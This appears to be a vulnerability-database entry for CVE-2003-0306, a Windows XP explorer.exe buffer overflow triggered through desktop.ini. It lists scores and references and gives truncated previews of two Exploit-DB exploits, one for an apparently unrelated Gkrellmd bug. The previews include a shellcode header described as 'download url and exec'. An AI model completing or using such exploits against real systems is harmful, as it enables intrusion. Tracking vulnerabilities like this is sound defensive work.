CVE-2003-0306
Published: 2003-06-09
Priority P4 24 · high · 7.2 (CVSS 2.0)
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 4.04% (89.3th percentile)
Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter.
No detection rules found.
Exploit-DB
Gkrellmd 2.1 - Remote Buffer Overflow (2)
exploitdb·2003-06-24
CVE-2003-0723 Gkrellmd 2.1 - Remote Buffer Overflow (2)
---
source: https://www.securityfocus.com/bid/8022/info
GKrellMd has been reported prone to a remote buffer overflow vulnerability; arbitrary code execution is possible.
The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received, arbitrary memory may be corrupted.
A remote attacker may ultimately exploit this issue to seize control of the affected daemon and execute arbitrary code.
This vulnerability has been reported to affect Gkrellm 2.1.13.
#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code an
Exploit-DB
Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow
exploitdb·2003-05-21
CVE-2003-0306 Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow
---
#include
#include
#include
#include
#include
char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=105284486526310&w=2
http://marc.info/?l=bugtraq&m=105301349925036&w=2
http://marc.info/?l=vuln-dev&m=105241032526289&w=2
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-027
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A3095